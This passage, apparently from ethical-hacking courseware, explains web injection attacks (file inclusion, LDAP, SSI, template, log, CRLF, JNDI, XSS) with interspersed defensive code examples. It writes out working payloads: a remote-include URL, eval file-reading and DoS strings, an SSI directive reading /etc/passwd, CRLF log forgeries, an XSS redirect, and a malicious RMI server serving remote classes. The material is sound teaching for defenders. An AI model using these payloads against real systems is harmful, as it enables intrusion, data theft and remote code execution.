assumes that only the URL of the banner image file is inserted into that field.

Figure 14.9: Command Injection attack example (the attacker submits
www.certifiedhacker.com/banner.gif||newpassword||1036|60|468 in the Banner URL field;
poor input validation at the server script, which issues database INSERT and UPDATE record
commands, is exploited)

File Injection Attack


A file injection attack is a technique used to exploit "dynamic file include" mechanisms in web
applications. File injection attacks enable attackers to exploit vulnerable scripts on the server to
use a remote file instead of a presumably trusted file from the local file system. It occurs when
a user is allowed to supply input for the include command dynamically and that input is not
properly validated before processing. When a user provides input, the web application passes it
into "file include" commands. Most web application frameworks support file inclusion. Hence,
an attacker enters a URL that redirects the application to the location of the malicious file.
While referring to the file without proper validation, the application executes the file script by
calling specific procedures. Web applications are vulnerable to file injection attacks if the
referred files are determined using elements from HTTP requests. PHP is particularly
vulnerable to these attacks because of the extensive use of "file includes" in PHP programming
and default server configurations.
If the included file ends with a .php extension and a user requests it, the application interprets
it as a PHP script and executes it. This allows an attacker to execute arbitrary commands.
Consider the following client code running in a browser:
<form method="get">
<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">
</form>
Vulnerable PHP code:
<?php
$drink = 'coke';
if (isset( $_GET['DRINK'] ) )
    $drink = $_GET['DRINK'];
require( $drink . '.php' );
?>
To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at
www.jasoneval.com, which contains an exploit.
Exploit code:
http://www.certifiedhacker.com/orders.php?DRINK=http://jasoneval.com/exploit?
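The DRINK include above and the Banner URL field from the command injection example, with the validation the server scripts lacked (an added example in Python, not code from the module; INCLUDE_DIR and the image-extension list are assumptions): the include name is resolved only through an allowlist and must stay inside the include directory, and the banner field must parse as a plain image URL containing none of the '|' separators the script used internally.

```python
import os
from urllib.parse import urlsplit

# Assumed location of the trusted include files (placeholder path, not from the module).
INCLUDE_DIR = os.path.realpath("/var/www/app/includes")
# Only the values the form actually offers map to a file; anything else is rejected.
ALLOWED_DRINKS = {"pepsi": "pepsi.php", "coke": "coke.php"}
IMAGE_EXTENSIONS = (".gif", ".png", ".jpg")  # assumed set for the banner field


def resolve_include(drink):
    """Return the local file to include for DRINK, or None if the value is not allowed.
    A value such as http://jasoneval.com/exploit? never reaches require(): it is not a
    key in the allowlist, so the remote-file behaviour of the vulnerable script cannot occur."""
    filename = ALLOWED_DRINKS.get(drink)
    if filename is None:
        return None
    path = os.path.realpath(os.path.join(INCLUDE_DIR, filename))
    # Defence in depth: even a mis-edited allowlist entry may not escape INCLUDE_DIR.
    if os.path.commonpath([path, INCLUDE_DIR]) != INCLUDE_DIR:
        return None
    return path


def valid_banner_url(value):
    """Accept only an http(s) URL that points at an image file. The '|' characters the
    attacker used to smuggle a new password and account number are rejected outright."""
    if "|" in value or any(ch.isspace() for ch in value):
        return False
    parts = urlsplit(value if "://" in value else "http://" + value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return parts.path.lower().endswith(IMAGE_EXTENSIONS)
```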

LDAP Injection Attacks


LDAP Directory Services store and organize information based on its attributes. The information
is hierarchically organized as a tree of directory entries. The Lightweight Directory Access
Protocol (LDAP) is based on the client-server model, and clients can search the directory entries
using filters.

Filter Syntax: (attributeName operator value)

Operator    Example
=
>=
<=
~=
*
AND (&)
OR (|)      (|(objectclass=user)(displayName=John))
NOT (!)     (!objectclass=group)

Figure 14.10: LDAP tree

An LDAP injection attack works in the same way as an SQL injection attack, but it exploits user
parameters to generate an LDAP query. LDAP runs on an Internet transport protocol such as
TCP, and it is an open-standard protocol for manipulating and querying Directory Services. An
LDAP injection technique is used to take advantage of non-validated web application input
vulnerabilities to pass LDAP filters used for searching Directory Services to obtain direct access
to databases behind an LDAP tree.
LDAP attacks exploit web-based applications that construct LDAP statements, using a local
proxy. Web applications may use user-supplied input to create custom LDAP statements for
dynamic web page requests. Attackers commonly perform LDAP injection attacks on web
applications employing user inputs to generate LDAP queries. The attackers can use the search
filter attributes to discover the underlying LDAP query structure. Using this structure, the
attacker includes additional attributes in the user-supplied input to determine whether the
application is vulnerable to LDAP injection and evaluates the web application's output.
Depending on the implementation of the target, attackers use LDAP injection to achieve:
■ Login bypass
■ Information disclosure
■ Privilege escalation
■ Information alteration
Example:
To test if an application is vulnerable to LDAP code injection, send a query to the server that
generates an invalid input. If the LDAP server returns an error, it can be exploited with code
injection techniques.
Figure 14.11: LDAP Injection attack example (Account Login form; Username:
certifiedhacker)(&)) Password: blah)

If an attacker enters the valid username "certifiedhacker" and injects certifiedhacker)(&)), then
the URL string becomes (&(USER=certifiedhacker)(&))(PASS=blah)). The LDAP server processes
only the first filter, (&(USER=certifiedhacker)(&)). This query is always true, so the attacker
logs into the system without a valid password.
An important defense method against such attacks is to filter all inputs to the LDAP; otherwise,
vulnerabilities in LDAP allow the execution of unauthorized queries or modification of its
contents. When the attacker modifies the LDAP statements, the process runs with the same
permissions as the component of the web application that executed the command.

Other Injection Attacks

■ Server-Side JS Injection
o Vulnerabilities for server-side JavaScript injections emerge when an application integrates
user-controllable values into a string that is dynamically validated by a code interpreter
o Attackers exploit these vulnerabilities to compromise the functionality and data of
applications hosted by the server
■ Server-Side Includes Injection
o Server-side Includes is an application feature that helps designers to auto-generate the
content of the web page without manual involvement
o Attackers exploit this feature to pass malicious SSI directives as input values and perform
malicious activities
■ Server-Side Template Injection
o Server-side template injection occurs when users are allowed to insert unsafe inputs into
a server-side template
o Attackers can inject malicious template directives to run arbitrary code and gain complete
control over the target web server
■ Log Injection
o Attackers launch log injection attacks by exploiting the acceptance of unsanitized or
non-validated input into application logs
■ HTML Injection
o Attackers exploit vulnerable form inputs to inject HTML code into a web page and change
the appearance of the website or the information provided to its users
■ CRLF Injection
o Attackers inject carriage return (\r) and linefeed (\n) characters into user input to trick a
web server, web application, or user into terminating the input of a current object and
initiating a new object
■ JNDI Injection
o The Java Naming and Directory Interface (JNDI) is a Java-based API that takes a single
parameter as input and searches for the requested object based on the specified name
o Attackers exploit this vulnerability by resolving the "classFactory" and
"classFactoryLocation" attribute requests made using "InitialContext().lookup(name)"
with a malicious class

Other Injection Attacks


Some other types of injection attacks are discussed below:
■ Server-Side JS Injection
Server-side JavaScript injection vulnerabilities arise when an application integrates user-controllable values into a string that the server's code interpreter dynamically evaluates, typically through eval(), new Function(), or a similar construct. Attackers exploit the missing validation to pass arbitrary values that alter the code the server compiles and executes. Such flaws let attackers compromise the functionality and data of the applications hosted on the server, and use the server as a foothold for further attacks on the target network.
Example of server-side JavaScript injection (Node.js):
Attackers can launch a DoS attack by passing the following command to the eval() function:
while(1)
This loop occupies the server's single-threaded event loop completely, so the process stops handling any further requests until it is restarted.
Attackers can also read files from the server. The following commands return the listing of the current and parent directories:
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('..').toString())
After retrieving the file names, attackers can pass the following command to read a file's contents:
res.end(require('fs').readFileSync(filename))
The vulnerability can be exploited further to write and execute malicious binaries using the fs and child_process modules.
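The eval() pattern described above, as an added example that is not from the original text or any project: a Node.js body parser in its vulnerable form beside the JSON.parse() replacement, plus the shape check a fixed endpoint should perform. The request bodies are constructed and the function names are assumptions.

```javascript
// Added example (not from the original text). A Node.js request handler that turns a
// JSON-looking request body into an object, first with eval() and then with JSON.parse().

function parseBodyUnsafe(body) {
  // VULNERABLE: eval() runs whatever JavaScript the client sends. The parentheses make
  // an object literal parse as an expression, which is exactly the idiom that lets a
  // value such as process.cwd() execute on the server instead of being stored as text.
  return eval("(" + body + ")");
}

function parseBodySafe(body) {
  // JSON.parse() accepts data only; a function call in the body is a SyntaxError.
  return JSON.parse(body);
}

function handleBody(body) {
  // What the fixed endpoint should do: parse as JSON, then validate the shape,
  // so that neither code nor unexpected types reach the application logic.
  let obj;
  try {
    obj = parseBodySafe(body);
  } catch (err) {
    return { ok: false, reason: "body is not valid JSON" };
  }
  if (typeof obj !== "object" || obj === null || Array.isArray(obj)) {
    return { ok: false, reason: "body is not a JSON object" };
  }
  if (typeof obj.user !== "string" || !Number.isInteger(obj.page) || obj.page < 1) {
    return { ok: false, reason: "unexpected field types" };
  }
  return { ok: true, user: obj.user, page: obj.page };
}

// Constructed request bodies. The attacker payload reads the server's working directory;
// while(1){} in the same position would be the event-loop DoS from the text (not executed
// here, since it would never return).
const BENIGN_BODY = '{"user": "alice", "page": 2}';
const INJECTED_BODY = '{"user": "alice", "page": process.cwd()}';
```

Run under Node: parseBodyUnsafe(INJECTED_BODY).page is the server's working directory, while parseBodySafe throws a SyntaxError on the same input and handleBody rejects it.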
• Server-Side Includes Injection
Server-side includes (SSI) is a web server feature that helps designers auto-generate the content of a web page without manual involvement. Directives of the form <!--#name parameter="value" --> are evaluated by the server when the page is served; they can include other files, print CGI environment variables, run shell commands, and so on. After all directives have been evaluated, the resulting HTML is delivered to the requester.
Typical directives include:
<!--#include virtual="/footer.html" -->
<!--#echo var="DATE_LOCAL" -->
Attackers launch SSI injection attacks to take control of web applications that place user input in SSI-enabled pages. Such an application accepts remote user input and reflects it in the page without validation, so attackers can pass SSI directives as input values and have the server evaluate them: modifying or erasing server files, running shell commands, and reading critical files such as /etc/passwd.
For example, because the input is not validated, the following directive makes the server execute the command and embed the contents of /etc/passwd in the page:
<!--#exec cmd="cat /etc/passwd" -->
• Server-Side Template Injection
When creating dynamic pages, designers and developers use template engines to separate programming logic from data presentation. Instead of one monolithic script that accepts the request, extracts the required information from the database, and emits the HTML, a template engine keeps the presentation of the data apart from the code that produces it.
Server-side template injection occurs when user input is inserted into the template source itself rather than passed to the template as a value. When this vulnerability exists, attackers can inject template directives that run arbitrary code and gain complete control over the target web server. The injection resembles XSS in form, but it executes inside the server rather than the browser and is typically used to reach server internals and achieve remote code execution, which makes every vulnerable application a prime target. Template injection arises through developer errors and through deliberate template exposure in applications that let users author templates, such as wikis, blogs, and marketing platforms.
For example, consider the following template, which mixes HTML with template expressions:
<html>
<head>
<title>{{title}}</title>
</head>
<body>
<form method="{{method}}" action="{{action}}">
<input type="text" name="user" value="{{username}}">
<input type="password" name="pwd" value="">
<button type="submit">Submit</button>
</form>
<p>This page took {{microtime(true) - time}} seconds to render.</p>
</body>
</html>
The application renders it through the template engine as follows:
$templateEngine = new TemplateEngine();
$template = $templateEngine->loadFile('SignUp.tpl');
$template->assign('title', 'login');
$template->assign('method', 'post');
$template->assign('action', 'SignUp.php');
$template->assign('username', getUsernameFromCookie());
$template->assign('time', microtime(true));
$template->show();
The expression {{microtime(true) - time}} shows that this engine evaluates native PHP functions inside template expressions. As long as user data such as the cookie-derived username reaches the engine only through assign(), it is treated as a value and rendered as text. If attackers can get their own {{...}} expressions into the template source, for instance through an uploaded or user-editable template file, the engine evaluates them, and they can call arbitrary functions to gain access to the target web server.
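The distinction drawn above between input passed as a value and input spliced into the template source, as an added example that is not from the original text: a toy engine that, like the PHP engine in the text, evaluates the expression inside each {{ ... }} with the language's native functions available. The template strings, function names and probes are assumptions.

```javascript
// Added example (not from the original text). A minimal template engine whose
// placeholders are compiled and executed, used correctly and then injectably.

function render(templateSource, data) {
  const names = Object.keys(data);
  return templateSource.replace(/\{\{\s*([^}]+?)\s*\}\}/g, (_, expr) => {
    // Each placeholder expression is compiled with the data keys in scope, just as
    // the PHP engine evaluates microtime(true) - time. Native functions are reachable.
    const fn = new Function(...names, "return (" + expr + ");");
    return String(fn(...names.map((n) => data[n])));
  });
}

const PROFILE_TEMPLATE = "<h2>Hello {{ username }}</h2>";

function renderProfileSafe(username) {
  // Correct use: the input is a value bound to a placeholder, never template source,
  // so a {{...}} inside it is rendered as literal text. (HTML escaping of the output
  // is a separate concern, covered under HTML injection and XSS.)
  return render(PROFILE_TEMPLATE, { username });
}

function renderProfileUnsafe(username) {
  // VULNERABLE: the input is concatenated into the template before it is compiled,
  // so the engine evaluates whatever {{ ... }} the user supplies.
  return render("<h2>Hello " + username + "</h2>", {});
}

// The classic probe: if 49 comes back, expressions are evaluated and the engine is injectable.
const ARITHMETIC_PROBE = "{{7*7}}";
// Once confirmed, the same channel reaches the runtime (here Node's process object).
const RUNTIME_PROBE = "{{process.platform}}";
```

A tester submits the arithmetic probe first; "49" in the response distinguishes template evaluation from plain reflection, and only then is a payload that touches the runtime worth sending.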


■ Log Injection
Attackers launch log injection attacks by exploiting unsanitized or unvalidated input that is written to application logs. Applications store many kinds of logs, such as access logs, transaction logs, monitoring logs, exception or error logs, GC logs, and crash logs. If an application or its administrator fails to log user events and actions securely, attackers can insert fake entries or records to corrupt the log file. Attackers use this technique to plant misleading information in the log and cover their tracks after a successful attack.
For instance, consider an application that logs requests in the following format:
Date, Time, Username, ID, source IP, Request
The unvalidated username and id values come directly from the request cookie:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username=xyz; id=Walkin
Attackers can embed a line break in the id value so that a forged entry of their choosing is written as a separate log line:
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username=xyz; id=Walkin\r\n(fake entry)
If the logging code does not escape null bytes, everything after a null byte may be dropped, for example when the entry passes through a C string. With
Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username=xyz; id=%00
the entry is truncated at the id field, and the source IP and request are never recorded:
Date, Time, Username, ...
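The log format above with a forged id value, as an added example that is not from the original text: one writer that records the field raw and one that neutralises control characters, with a line count standing in for what an analyst or log parser would see. The sample field values are constructed; the escape notation is an assumption. The same sanitiser covers the CRLF-based log forging described later in this section, since the injected characters are the same.

```javascript
// Added example (not from the original text). Composing the
// "Date, Time, Username, ID, source IP, Request" entry from the text.

function sanitizeLogField(value) {
  // Replace CR, LF, NUL and the other C0/DEL controls with a visible \xNN escape so a
  // single user-supplied value can neither start a new log line nor truncate the entry.
  return String(value).replace(/[\x00-\x1f\x7f]/g, (ch) => {
    return "\\x" + ch.charCodeAt(0).toString(16).padStart(2, "0");
  });
}

function formatEntry(fields, sanitize) {
  const f = sanitize ? fields.map(sanitizeLogField) : fields;
  return f.join(", ") + "\n";
}

function countEntries(logText) {
  // Each non-empty line is what a parser (or a human) will treat as one entry.
  return logText.split("\n").filter((line) => line.length > 0).length;
}

// Constructed request data. The attacker's id carries a CRLF followed by a forged entry
// that attributes an admin action to localhost; the real trailing fields (source IP and
// request) end up appended to the forged line.
const FORGED_ID = "Walkin\r\n2024-05-01, 09:25, admin, 42, 127.0.0.1, /admin?restrictedaction=edit";
const FIELDS = ["2024-05-01", "09:25", "xyz", FORGED_ID, "10.10.10.10", "/index.php?page=about"];

function writeUnsafe() {
  return formatEntry(FIELDS, false);
}

function writeSafe() {
  return formatEntry(FIELDS, true);
}
```

With the raw writer the single request produces two log lines, one of them the attacker's; with the sanitiser it produces one line in which the CRLF is visible as \x0d\x0a and the forged text stays inside the ID field.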
■ HTML Injection
An HTML injection attack is initiated by injecting HTML code through vulnerable form inputs of a web page to change the appearance of the website or the information provided to its users. It differs from JavaScript and VBScript injection in that no script needs to execute. HTML is the core language used to build a website, and attackers target it to change the site's functionality and original look. If an attacker can successfully inject HTML code, legitimate users may be diverted from their intended activity.
For instance, injected HTML lets the attacker create a malicious form that looks genuine to end users and asks them to re-enter their credentials. Once the form is submitted, the credentials are sent to the attacker.
Example: general application template for a search results page:
<html>
<h1> Results matching the given query: </h1>
<h2> {user_query} </h2>
<ol> <li> Result A
<li> Result B </ol>
</html>
User query:
</h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2>
Resulting page following HTML injection:
<html>
<h1> Results matching the given query: </h1>
<h2></h2> special offer <a href=www.certifiedhacker.com>malicious link</a><h2></h2>
<ol> <li> Result A
<li> Result B </ol>
</html>
This reflected form affects only the attacker's own request. The attacker's real aim is to place HTML in a page that other users visit, which requires the injected code to be stored in content that is later shown to them. That happens when the application saves untrusted user input and displays it to other users. For instance, assume that the same application has a page showing the user's search history:
Code snippet (application template) for the search history page
<html>
<h1> Recent search history: </h1>
<ol> <li><h2> {user_query_1} </h2>
<li><h2> {user_query_2} </h2> </ol>
</html>
Resulting search history page following HTML injection
<html>
<h1> Recent search history: </h1>
<ol>
<li><h2> Top 10 thriller movies </h2>
<li><h2></h2> special offer <a href=www.certifiedhacker.com> malicious link</a><h2></h2>
</ol> </html>
Now every user who views the search history page is shown the malicious link generated by the attacker. If a user is attracted to the link and opens it, he/she will be viewing content served from the attacker's domain, and any credentials entered on that page are sent to the attacker.
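The search results template above rendered two ways, as an added example that is not from the original text: raw substitution beside HTML-escaped substitution, fed with this section's payload and with the exec directive from the server-side includes section, since escaping the angle brackets neutralises both. The template text is assumed, and the tag count is only a check on the rendered output, not a defence.

```javascript
// Added example (not from the original text). Output encoding for a value
// placed in the HTML body, tested against HTML and SSI payloads.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const RESULTS_TEMPLATE =
  "<html><h1>Results matching the given query:</h1><h2>{user_query}</h2>" +
  "<ol><li>Result A</li><li>Result B</li></ol></html>";

function renderResultsUnsafe(userQuery) {
  // VULNERABLE: the raw query lands in the page body. On a server that evaluates
  // SSI directives in generated pages, an <!--#exec ...--> here is run before delivery.
  return RESULTS_TEMPLATE.replace("{user_query}", () => userQuery);
}

function renderResultsSafe(userQuery) {
  // Escaping turns every '<' into text, so no new element or directive can appear.
  return RESULTS_TEMPLATE.replace("{user_query}", () => escapeHtml(userQuery));
}

function countTags(html) {
  // Number of markup tags in the output; the template alone has a fixed count.
  return (html.match(/<[^>]+>/g) || []).length;
}

const TEMPLATE_TAG_COUNT = countTags(RESULTS_TEMPLATE);
// Payloads taken from the HTML injection and SSI injection sections above.
const HTML_PAYLOAD = "</h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2>";
const SSI_PAYLOAD = '<!--#exec cmd="cat /etc/passwd" -->';
```

The escaped render has exactly the template's tag count for every input; any increase in the unsafe render is attacker-controlled markup. Note that this encoding is correct only for the HTML body context; attribute, URL and script contexts need their own encoders.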


■ CRLF Injection
In a carriage return line feed (CRLF) injection attack, attackers inject carriage return (\r) and line feed (\n) characters into user input to trick the web server, web application, or user into treating the current object as terminated and a new object as started. The vulnerability manifests when an application places user-supplied CRLF characters into output where they have structural meaning. These characters mark the end of a line in many Internet protocols, and when they land in HTTP request or response headers they enable attacks such as HTTP request smuggling and HTTP response splitting.
HTTP request smuggling can occur when an HTTP request passes through a server that acts as a proxy, validating and forwarding the request to the next server, and the two servers disagree on where the request ends. It can lead to further attacks such as cache poisoning, bypass of firewall or WAF rules, and request hijacking.
In HTTP response splitting, attackers inject arbitrary HTTP headers, followed by a blank line, into a response header whose value they control, splitting the response into a header section and a second body. The client or an intermediate proxy then sees two responses instead of one, which can lead to further attacks such as cross-site scripting and cache poisoning.
Consider the following example of CRLF injection in log files:
Suppose that the admin panel keeps a log file with the IP address, time, and URL path of each visit, as follows:
10.10.10.10 - 09:25 - /index.php?page=about
If an attacker can embed CRLF characters in the HTTP request, he/she can break the line and append a fake log entry by requesting the following URL:
/index.php?page=about&%0d%0a127.0.0.1 - 09:25 - /index.php?page=about&restrictedaction=edit
Here, %0d and %0a are the URL-encoded CR and LF characters. After the injected CRLF is written out, the log entries appear as follows:
10.10.10.10 - 09:25 - /index.php?page=about&
127.0.0.1 - 09:25 - /index.php?page=about&restrictedaction=edit
The forged second line attributes a privileged action to localhost. Attackers exploit CRLF injection vulnerabilities to manipulate log entries in this way and hide their malicious activities.
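The response splitting case from above, as an added example that is not from the original text: a redirect whose Location header is taken from a request parameter, built once by concatenation and once with the CR/LF check that header handling requires, and a splitter that reads the raw bytes the way a client or caching proxy would. Header names, paths and the payload are assumptions.

```javascript
// Added example (not from the original text). HTTP response splitting through a
// user-controlled Location header, and the check that prevents it.

function buildRedirectUnsafe(target) {
  // VULNERABLE: a decoded %0d%0a in the parameter ends the header line, and a second
  // %0d%0a%0d%0a ends the whole header section, so the attacker can append a response.
  return "HTTP/1.1 302 Found\r\nLocation: " + target + "\r\nContent-Length: 0\r\n\r\n";
}

function assertHeaderValue(value) {
  // Node's http module applies the same rule and throws ERR_INVALID_CHAR.
  if (/[\r\n\0]/.test(value)) {
    throw new Error("header value contains a line terminator or NUL");
  }
  return value;
}

function buildRedirectSafe(target) {
  return "HTTP/1.1 302 Found\r\nLocation: " + assertHeaderValue(target) + "\r\nContent-Length: 0\r\n\r\n";
}

function splitResponses(raw) {
  // Every blank line ends a header block; each block that starts with a status line
  // is a response the receiver will parse separately.
  return raw.split("\r\n\r\n").filter((part) => part.startsWith("HTTP/"));
}

// Constructed attacker input: the redirect target followed by a complete second
// response that carries a script. A proxy that caches it under the next URL it
// forwards serves the script to other users.
const SPLIT_PAYLOAD = decodeURIComponent(
  "/home%0d%0aContent-Length:%200%0d%0a%0d%0a" +
  "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a" +
  "<script>alert(1)</script>"
);
```

The unsafe builder yields two parseable responses from one call; the safe builder refuses the value before it reaches the wire.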
■ JNDI Injection
The Java Naming and Directory Interface (JNDI) is a Java API that takes a single name as input and looks up the object bound to that name. It can resolve names through naming and directory services such as Common Object Request Broker Architecture (CORBA), LDAP, DNS, and Remote Method Invocation (RMI). If the name points at a service controlled by attackers, the application fetches a malicious class object from that server, which leads to remote code execution and eventually the compromise of the application.
Attackers exploit a target Java application that performs InitialContext().lookup(name) on attacker-controlled input by answering the lookup with a naming Reference whose "classFactory" and "classFactoryLocation" attributes name a malicious class. If the object bound under the requested name is a Reference to a factory class that is not found on the application's classpath, the Java application resolves "classFactoryLocation", which is a URL, downloads the class bytecode from it, instantiates it, and thereby executes the attacker's code.
The following is sample code in a vulnerable application that allows JNDI injection:
@RequestMapping("/lookup")
@Example(uri = {"/lookup?name=java:comp/env"})
public Object lookup(@RequestParam String name) throws Exception {
    return new javax.naming.InitialContext().lookup(name);
}
The following sample code is the attacker-side RMI registry that answers the lookup with a Reference pointing at bytecode hosted on a malicious URL:
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class MaliciousRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating malicious RMI registry on port 1097");
        Registry myregistry = LocateRegistry.createRegistry(1097);
        // The factory class "ExportObject" is not on the victim's classpath, so the
        // victim loads it from the classFactoryLocation URL given as the third argument
        Reference reff = new Reference("ExportObject", "ExportObject",
                "http://www.certifiedhacker.com/");
        ReferenceWrapper referenceWrap = new ReferenceWrapper(reff);
        // Bound under "Object": a lookup of rmi://attacker:1097/Object returns the Reference
        myregistry.bind("Object", referenceWrap);
    }
}



Cross-Site Scripting (XSS) Attacks


Cross-site scripting (XSS, historically also abbreviated CSS) attacks exploit vulnerabilities in dynamically generated web pages, which enables attackers to inject client-side script into web pages viewed by other users. Such attacks occur when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. Because the injected script is delivered by the vulnerable site, it runs in that site's origin, inherits the victim's session and privileges, and can rewrite the HTML content of the page.
Some exploitations that can be performed by XSS attacks are as follows:
■ Malicious script execution
■ Redirecting to a malicious server
■ Exploiting user privileges
■ Ads in hidden IFRAMES and pop-ups
■ Data manipulation
■ Session hijacking
■ Brute-force password cracking
■ Data theft
■ Intranet probing
■ Keylogging and remote monitoring
How XSS Attacks Work

A web page consists of text and HTML markup created by the server and rendered by the client browser. Servers fully control the content of statically generated pages, but they cannot fully control how the client interprets the output of a page generated dynamically from untrusted input. Thus, if an attacker inserts untrusted content into a dynamic page, neither the server nor the client recognizes it as foreign. Untrusted input can come from URL parameters, form fields, cookies, database queries, and so on.


If the dynamic data inserted by the web server contains special characters, the user's web
browser will mistake them for HTML markup, as it treats some characters as special to
distinguish text from markup. Thus, an attacker can choose the data inserted into the
generated page and mislead the user's browser into running the attacker's script. As the
malicious scripts will execute in the browser's security context for communicating with the
legitimate web server, the attacker will have complete access to the document retrieved and
may send the data in the page back to his/her site.

[Figure: a normal request for http://certifiedhacker.com/jason_file.html returns "404 Not found" from a page that handles requests for nonexistent pages, a classic 404 error page. Server code:]
<html>
<body>
<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
</body>
</html>
[XSS attack code: the attacker instead requests http://certifiedhacker.com/<script>alert("WARNING: The application has encountered an error");</script>, and the browser shows the alert because the decoded request URI is echoed into the page unescaped.]

Figure 14.12: Demonstration of XSS attack

Note: Check the CEH Tools, Module 14: Hacking Web Applications, for the XSS cheat sheet.
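The 404 handler from Figure 14.12 ported from PHP to a JavaScript function, its fixed form, and the reflection probe a tester runs to decide whether the page is exploitable, as an added example that is not from the original text. The function names, the probe format and the canary are assumptions.

```javascript
// Added example (not from the original text). Reflected XSS in a 404 page and a
// probe that distinguishes unescaped reflection from a safe echo.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function notFoundVulnerable(requestUri) {
  // Same behaviour as: print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
  // The decoded URI is placed in the HTML body as-is.
  return "<html><body>Not found: " + decodeURIComponent(requestUri) + "</body></html>";
}

function notFoundFixed(requestUri) {
  // The only change: encode for the HTML body context before echoing.
  return "<html><body>Not found: " + escapeHtml(decodeURIComponent(requestUri)) + "</body></html>";
}

function probeReflectedXss(handler, canaryId) {
  // Send a unique, harmless tag and check whether it comes back as markup. A hit means
  // the decoded URI reaches the HTML body unescaped; the real payload can then be the
  // alert() from the figure or a script that ships document.cookie to the attacker.
  const marker = "<xss" + canaryId + ">";
  const body = handler("/" + encodeURIComponent(marker));
  return body.includes(marker);
}

// The request from the figure, for comparison with the probe.
const ATTACK_URI = '/<script>alert("WARNING: The application has encountered an error");</script>';
```

Probing with a unique canary rather than a script tag avoids tripping filters during reconnaissance and makes the result unambiguous: the exact marker either appears as a tag or it does not.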

Cross-Site Scripting Attack Scenario: Attack via Email


In a cross-site scripting attack that employs email, the attacker crafts an email containing a link to the malicious script and sends it to the victim, luring the victim into clicking the link that carries the malicious script/query. For example, if the attacker finds a cross-site scripting vulnerability on the bank.com website, he/she constructs a link embedded with a malicious script such as
<A HREF=http://bank.com/registration.cgi?clientprofile=<SCRIPT>maliciouscode</SCRIPT>>Click here</A>
and sends it to the target user by email. When the user clicks the link, the URL is sent to bank.com with the malicious code in the clientprofile parameter. The legitimate server hosting the bank.com website sends back a page that includes the value of clientprofile, and the malicious code executes on the client machine in the context of bank.com. The malicious code asks the victim to enter profile information. After the user enters all the requested personal details and clicks Submit, the attacker receives the information and can use it to impersonate the user, gain access to the user's online bank account, and perform other fraudulent activities.
[Figure: the attacker sends the user an email beginning "Hi, You have won a ..." that contains the malicious link HREF=http://bank.com/...; the user clicks the link; a Client Profile form (Name, Age, Location, Occupation, Bank User ID, User Password) is shown; the user enters profile information and clicks Submit; the request is received by the server hosting bank.com; the attacker harvests these credentials and gets access to the victim's bank account]

Figure 14.13: XSS attack via email

XSS Example: Attack via Email

[Figure: sequence between the Attacker, the User's Browser, the Malicious Script, the Attacker's Server and the Legitimate Server. 1. The attacker constructs a malicious link: <A HREF=http://Juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>. 2. The attacker emails the URL to the user and convinces the user to click on it. 3. The user's browser requests the page from the legitimate server. 4. The legitimate server returns the page with the malicious script. 5. The script runs in the user's browser.]

Figure 14.14: XSS example - attack via email


XSS Example: Stealing Users' Cookies

[Figure: same participants as Figure 14.14. 1. The attacker constructs the malicious link <A HREF=http://Juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>>Click here</A>. 2. The attacker emails the URL to the user and convinces the user to click on it. 3. The user's browser requests the page. 4. The legitimate server returns the page with the malicious script. 5. The script runs in the browser; the figure's subject is that it sends the user's cookies to the attacker's server.]

Figure 14.15: XSS example - Stealing users' cookies

XSS Example: Sending an Unauthorized Request

[Figure: same participants as Figure 14.14. 1. The attacker constructs a malicious link. 2. The attacker emails the URL to the user and convinces the user to click it. 3. The user's browser requests the page. 4. The legitimate server returns the page with the malicious script. 5. The script runs in the browser and sends an unauthorized request on the user's behalf.]

Figure 14.16: XSS example - Sending an unauthorized request


XSS Attack in Blog Posting


The attacker finds an XSS vulnerability in the techpost.org website, constructs a malicious script
<script>onload=window.location='http://www.certifiedhacker.com'</script>, and adds it in
the comment field of TechPost. This malicious script posted by the attacker is stored on the
web application database server and runs in the background. When a user visits the TechPost
website, the malicious script injected by the attacker in the TechPost comment field activates
and redirects the user to the malicious website certifiedhacker.com.

[Figure: the attacker adds a comment to the TechPost blog post "Facebook acquires file-sharing service" containing <script>onload=window.location='http://www.certifiedhacker.com'</script>; the comment with the malicious link is stored on the database server behind the web application; when a user visits the TechPost website, the injected script runs and the user is redirected to the malicious website certifiedhacker.com]

Figure 14.17: XSS attack in a blog posting



XSS Attack in Comment Field


Many web applications build HTML pages from data that arrives dynamically from different sources, and that data changes the page returned for each request. Attackers take advantage of this by submitting HTML tags as data. In a comment field, they post a comment that carries a malicious script; when another user's browser loads the page containing that comment, it executes the script and accomplishes the attacker's goals.
